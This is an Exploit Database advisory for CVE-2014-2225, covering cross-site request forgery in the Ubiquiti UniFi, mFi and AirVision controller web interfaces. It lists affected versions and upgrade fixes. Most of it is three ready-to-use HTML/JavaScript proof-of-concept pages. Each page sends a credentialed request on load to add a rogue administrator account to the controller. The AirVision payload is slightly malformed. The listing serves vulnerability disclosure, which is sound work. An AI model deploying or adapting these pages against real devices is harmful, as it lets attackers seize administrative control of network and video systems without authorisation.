Ubiquiti UbiFi / mFi / AirVision – Cross-Site Request Forgery

• Exploit Database
• 10 阅读

• 作者： Seth Art
  日期： 2014-07-28
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/34187/

• # Vendor Homepage: (http://www.ubnt.com/)
  
  # Tested on: Kali Linux
  -----------------------------------------
  Affected Products/Versions:
  -----------------------------------------
  UniFi Controller v2.4.6
  mFi Controller v2.0.15
  AirVision Controller v2.1.3
  Note: Previous versions may be affected
  
  
  -----------------
  Description:
  -----------------
  Title: Cross-site Request Forgery (CSRF)
  CVE: CVE-2014-2225
  CWE: http://cwe.mitre.org/data/definitions/352.html
  
  
  Detailed writeup: http://sethsec.blogspot.com/2014/07/cve-2014-2225.html
  Researcher: Seth Art - @sethsec
  
  ---------------
  UniFi POC:
  
  ---------------
  
  <html>
  <head>
  <script>
  function sendCSRF()
  {
  var url_base = "https://192.168.0.106:8443/api/add/admin"
  
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
  
  
  charset=UTF-8");
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
  }
  
  </script>
  </head>
  <body>
  <h1>CSRF POC</h1>
  Sending CSRF Payload!!!
  
  <body onload="sendCSRF()">
  
  </body>
  
  -------------
  mFi POC:
  -------------
  <html>
  <head>
  <script>
  function sendCSRF()
  {
  var url_base = "https://192.168.0.106:6443/api/v1.0/add/admin"
  
  
  var post_data="%7B%22name%22%3A%22csrf%22%2C%22lang%22%3A%22en_US%22%2C%22x_password%22%3A%22csrf%22%7D"
  
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  
  
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded;
  charset=UTF-8");
  xmlhttp.withCredentials= "true";
  
  
  xmlhttp.send(post_data);
  }
  
  </script>
  </head>
  <body>
  <h1>CSRF POC</h1>
  Sending CSRF Payload!!!
  <body onload="sendCSRF()">
  </body>
  
  
  
  --------------------
  
  AirVision POC:
  --------------------
  <html>
  <head>
  <script>
  function sendCSRF()
  {
  var url_base = "https://192.168.0.106:7443/api/v2.0/admin"
  
  
  var post_data="{\”name\”:\”csrf\”,\”email\”:\”csrf@gmail.com\”,\”userGroup:\”:\”admin\”,\”x_password\”:\”password\”,\”confirmPassword\”:\”password\”,\”disabled\”:\”false\”}”
  
  
  var xmlhttp;
  xmlhttp = new XMLHttpRequest();
  xmlhttp.open("POST", url_base, true);
  xmlhttp.setRequestHeader("Accept","*/*");
  xmlhttp.setRequestHeader("Content-type","application/plain; charset=UTF-8");
  
  
  xmlhttp.withCredentials= "true";
  xmlhttp.send(post_data);
  }
  
  </script>
  </head>
  <body>
  <h1>CSRF POC</h1>
  Sending CSRF Payload!!!
  <body onload="sendCSRF()">
  
  
  </body>
  
  
  
  -------------
  Solution:
  -------------
  UniFi Controller - Upgrade to UniFi Controller v3.2.1 or greater
  mFi Controller - Upgrade to mFi Controller v2.0.24 or greater
  AirVision Controller - Upgrade to UniFi Video v3.0.1 or greater (Note:
  
  The application name changed from AirVision to UniFi Video)